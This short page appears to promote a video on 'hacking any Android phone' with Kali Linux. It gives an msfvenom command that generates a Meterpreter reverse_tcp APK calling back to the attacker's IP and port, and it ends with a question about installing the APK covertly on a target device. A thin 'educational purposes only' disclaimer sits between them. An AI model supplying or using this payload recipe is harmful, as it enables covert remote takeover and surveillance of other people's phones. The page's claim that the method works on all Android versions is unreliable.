How to Hack any Android Phone by using Kali Linux

Ethical Hacking Educational Video:

Today I am showing to you that how to easily Hack any Android Phone from your Computer by using Kali Linux. Simply follow the easy step by step instructions in this video & you’ll be able to Hack any Android Phone within minutes. This method works with all versions of Android.

Steps to create APK file:

Type in your terminal

msfvenom -p android/meterpreter/reverse_tcp Lhost= “your IP Address” Lport= “your Port Address” R “here angle bracket” “file name”.apk


This video is only for educational purposes. Please do not use this method for illegal or malicious activities because hacking is a crime. You can’t hack someone phone without her permission. If you do this then it’s can land you in jail.


The question is??
Is there any way to install this apk under the hood?

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